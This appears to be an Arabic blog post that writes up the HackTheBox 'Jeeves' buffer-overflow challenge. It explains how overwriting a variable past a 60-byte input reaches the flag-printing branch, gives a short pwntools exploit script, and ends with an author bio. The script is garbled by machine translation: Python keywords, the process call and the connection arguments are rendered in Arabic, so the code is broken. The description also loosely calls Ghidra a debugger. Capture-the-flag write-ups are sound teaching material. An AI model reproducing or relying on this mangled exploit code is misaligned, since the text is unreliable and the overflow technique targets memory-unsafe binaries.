لقد قمنا بتغطية سيناريو وجود ثنائي عرضة لثغرة تجاوز سعة المخزن المؤقت. تم تمكين حماية NX وPIE في الملف الثنائي، لذلك فتحنا الملف الثنائي باستخدام مصحح أخطاء Ghidra وقمنا ببناء منهجية الاستغلال بناءً على حساب إزاحات متغير الإدخال ومتغير آخر يتحكم في إدخال عبارة if التي تطبع العلامة. كان الهدف هو التحكم في قيمة هذا الثنائي والسماح لتدفق التنفيذ بالدخول إلى عبارة if. كان هذا جزءًا من HackTheBox جيفيس مقدمة لمسار الاستغلال الثنائي.

ملاحظات تقنيات تجاوز سعة المخزن المؤقت

رمز الاستغلال موجود أدناه

##البداية

من استيراد pwn *

الهدف = العملية ("NC")

target.sendline ("منفذ IP")

الحمولة = "أ"*60

byte_to_string = p64(القيمة)

الحمولة = الحمولة + byte_to_string.decode("ISO-8859-1")

target.sendline (الحمولة)

طباعة target.recvuntil(".")

##Eالنهاية

تجول الفيديو

عن المؤلف

أقوم بإنشاء ملاحظات حول الأمن السيبراني وملاحظات التسويق الرقمي والدورات التدريبية عبر الإنترنت. أقدم أيضًا استشارات التسويق الرقمي بما في ذلك، على سبيل المثال لا الحصر، تحسين محركات البحث وإعلانات Google وMeta وإدارة CRM.

عرض المقالات